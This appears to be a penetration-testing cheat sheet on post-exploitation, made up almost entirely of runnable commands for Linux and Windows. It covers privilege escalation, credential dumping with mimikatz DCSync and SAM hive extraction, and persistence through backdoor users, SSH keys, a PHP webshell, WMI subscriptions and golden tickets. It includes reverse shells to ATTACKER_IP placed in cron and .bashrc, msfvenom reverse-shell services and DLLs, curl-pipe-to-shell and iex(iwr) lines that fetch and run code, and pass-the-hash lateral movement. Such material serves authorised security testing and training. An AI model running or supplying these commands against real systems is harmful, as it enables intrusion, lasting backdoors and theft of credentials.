Methodology — Phase 3

Post-Exploitation

Privilege escalation, persistence, and lateral movement. From low-priv shell to domain dominance.

LinPEAS / WinPEAS GTFOBins Mimikatz BloodHound Ligolo-ng Impacket
Back to Home
Recon & Enum Initial Access Post-Exploitation
Table of Contents

Post-Exploitation Path

01
Enumerate

LinPEAS / WinPEAS — map the attack surface from inside.

02
Escalate

SUID, sudo, tokens, weak perms, kernel exploits.

03
Persist

SSH keys, services, cron, WMI, tickets.

04
Pivot

Ligolo-ng, Chisel, SSH tunnels, lateral movement.

1. Linux Enumeration

LinPEAS & LinEnum
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

2. Linux Privilege Escalation

1. Kernel Exploits
# DirtyPipe (CVE-2022-0847)
gcc -o dirtypipe dirtypipe.c && ./dirtypipe /etc/passwd

# DirtyCow (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty newpassword
2. SUID / Sudo Abuse — GTFOBins
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Check sudo permissions
sudo -l

# SUID find
find . -exec /bin/sh \; -quit

# sudo vim
sudo vim -c ':!/bin/bash'

# sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'

# SUID bash
bash -p

# sudo nmap (older versions)
echo "os.execute('/bin/bash')" > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
3. Weak File Permissions — /etc/passwd & /etc/shadow
ls -la /etc/passwd /etc/shadow

# /etc/passwd writable — add root user
echo 'hacker:$(openssl passwd -1 password123):0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker

# /etc/shadow readable — crack hashes
unshadow /etc/passwd /etc/shadow > hashes.txt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
4. Bash History
cat ~/.bash_history
cat /home/*/.bash_history
cat /root/.bash_history
grep -i "pass\|secret\|key\|token\|ssh\|sudo" ~/.bash_history
5. Cron Jobs & Linux Capabilities
# Enumerate cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/root

# Writable cron script — inject reverse shell
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/cron_script.sh

# Linux Capabilities
getcap -r / 2>/dev/null

# python3 with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

3. Linux Persistence

SSH Keys
ssh-keygen -t rsa -b 4096 -f /tmp/backdoor_key -N ""
mkdir -p /root/.ssh
cat /tmp/backdoor_key.pub >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

ssh -i /tmp/backdoor_key root@TARGET_IP
Backdoor User
useradd -m -s /bin/bash backdooruser
echo "backdooruser:Password123!" | chpasswd
usermod -aG sudo backdooruser

# Direct sudoers entry
echo "backdooruser ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
Cron Reverse Shell
# Every minute, every hour, every day
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -

crontab -l
Shell Config & Webshell
# .bashrc / .profile backdoor
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> ~/.bashrc
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> ~/.profile

# PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
curl http://TARGET_IP/shell.php?cmd=id

4. Windows Enumeration

WinPEAS & PowerUp
# WinPEAS
certutil -urlcache -split -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe winpeas.exe
.\winpeas.exe

# PowerUp
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -UseBasicParsing); Invoke-AllChecks

# Manual checks
whoami /all
whoami /priv
net user
net localgroup administrators
systeminfo
wmic qfe list brief  # installed patches

5. Windows Privilege Escalation

1. Kernel Exploits — Windows Exploit Suggester
# On target
systeminfo > systeminfo.txt

# On attacker
pip install xlrd==1.2.0
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt
2. Token Impersonation
whoami /priv  # look for SeImpersonatePrivilege

# Juicy Potato
.\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami" -t *

# PrintSpoofer
.\PrintSpoofer.exe -i -c cmd

# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"

# Sweet Potato
.\SweetPotato.exe -a whoami
3. Credential Dumping — Kerberoasting & DCSync
# Kerberoasting
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# DCSync with mimikatz
.\mimikatz.exe "lsadump::dcsync /domain:DOMAIN /user:krbtgt" "exit"
.\mimikatz.exe "lsadump::dcsync /domain:DOMAIN /all" "exit"

# DCSync with impacket
secretsdump.py DOMAIN/user:password@DC_IP
4. AutoLogon Passwords
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultUserName, DefaultPassword, AltDefaultPassword

Get-UnattendedInstallFile
Get-WebConfig
Get-ApplicationHost
5. Bypass UAC
# UACME (Akagi)
.\Akagi64.exe 23 C:\Windows\System32\cmd.exe

# FodHelper method
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -name "(default)" -value "cmd /c start cmd.exe" -Force
New-ItemProperty -Path "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
6. SAM & SYSTEM Dump — Offline
# Save registry hives on target
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY

# Offline dump on attacker
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

# Live dump via SMB
impacket-secretsdump DOMAIN/user:password@TARGET_IP

6. Windows Persistence

1. Malicious Service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o service_backdoor.exe

sc create BackdoorSvc binpath= "C:\Temp\service_backdoor.exe" start= auto
sc start BackdoorSvc

# PowerShell
New-Service -Name "BackdoorSvc" -BinaryPathName "C:\Temp\service_backdoor.exe" -StartupType Automatic
Start-Service "BackdoorSvc"
2. Golden, Silver & Diamond Tickets
# Golden Ticket — needs krbtgt hash
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt" "exit"

# Silver Ticket — needs service account hash
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:server.domain.com /service:cifs /rc4:SERVICE_HASH /ptt" "exit"

# Diamond Ticket (impacket)
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN -request -user Administrator diamond_ticket

# Pass-the-Ticket
.\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"
klist
3. WMI Persistence
$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{
    Name = "PersistFilter"; EventNameSpace = "root/cimv2"; QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{
    Name = "PersistConsumer"; CommandLineTemplate = "cmd.exe /c C:\Temp\backdoor.exe"
}
Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{
    Filter = $filter; Consumer = $consumer
}

# Via impacket
wmiexec.py DOMAIN/user:password@TARGET_IP
4. DLL Injection
# Find hijackable DLLs
Find-PathDLLHijack
Find-ProcessDLLHijack

# Compile malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o malicious.dll

# Drop in searchable path
copy malicious.dll C:\some\writable\path\legit.dll

# Inject with PowerSploit
Invoke-DllInjection -ProcessID <PID> -Dll C:\Temp\malicious.dll
Invoke-ReflectivePEInjection -PEPath C:\Temp\malicious.dll -ProcId <PID>

7. Pivoting & Lateral Movement

Reference: Full tunneling and pivoting guide at passioncoder5.github.io/htb-writeups/tunneling_pivoting
SSH Tunneling
# Local port forward
ssh -L LOCAL_PORT:TARGET_HOST:TARGET_PORT user@JUMP_HOST

# Dynamic port forward (SOCKS proxy)
ssh -D 1080 user@JUMP_HOST
proxychains nmap -sT TARGET_IP

# Remote port forward
ssh -R REMOTE_PORT:localhost:LOCAL_PORT user@ATTACKER_IP
Chisel
# Attacker (server)
./chisel server -p 8080 --reverse

# Target (client)
./chisel client ATTACKER_IP:8080 R:socks

# Use with proxychains
# /etc/proxychains.conf → socks5 127.0.0.1 1080
proxychains nmap -sT -p 22,80,443 INTERNAL_IP
Ligolo-ng
# Attacker — start proxy
./proxy -selfcert -laddr 0.0.0.0:11601

# Target — connect agent
./agent -connect ATTACKER_IP:11601 -ignore-cert

# In ligolo UI
session          # select session
start            # start tunnel

# Add route to internal network
ip route add 172.16.0.0/24 dev ligolo

# Double pivot — agent on second host
./agent -connect ATTACKER_IP:11601 -ignore-cert
Lateral Movement
# SMB lateral movement
impacket-smbexec DOMAIN/user:password@TARGET_IP
impacket-psexec DOMAIN/user:password@TARGET_IP

# WinRM
evil-winrm -i TARGET_IP -u user -p password

# Pass-the-Hash
impacket-psexec DOMAIN/user@TARGET_IP -hashes :NTLM_HASH
crackmapexec smb TARGET_IP -u user -H NTLM_HASH --exec-method smbexec

# RDP through SOCKS
proxychains xfreerdp /v:TARGET_IP /u:user /p:password

# WMI
wmiexec.py DOMAIN/user:password@TARGET_IP "whoami"

Quick Reference

TaskToolKey Command
Linux enumlinpeascurl -L linpeas.sh | sh
Find SUID binsfindfind / -perm -4000 -type f 2>/dev/null
Sudo privescGTFOBinssudo -l → gtfobins.github.io
Capabilitiesgetcapgetcap -r / 2>/dev/null
Crack shadowhashcat-m 1800 hashes.txt rockyou.txt
Windows enumwinpeas.\winpeas.exe
Token abuseGodPotato.\GodPotato.exe -cmd "cmd /c whoami"
DCSyncmimikatzlsadump::dcsync /domain:X /user:krbtgt
SAM dumpsecretsdump-sam SAM -system SYSTEM LOCAL
Golden ticketmimikatzkerberos::golden /krbtgt:HASH /ptt
WMI execwmiexec.pyDOMAIN/user:pass@TARGET
SOCKS proxychiselserver -p 8080 --reverse
Tunnelligolo-ngproxy -selfcert / agent -connect
Pass-the-Hashcrackmapexec-u user -H NTLM_HASH
WinRM accessevil-winrm-i TARGET -u user -p pass
Initial Access Back to Home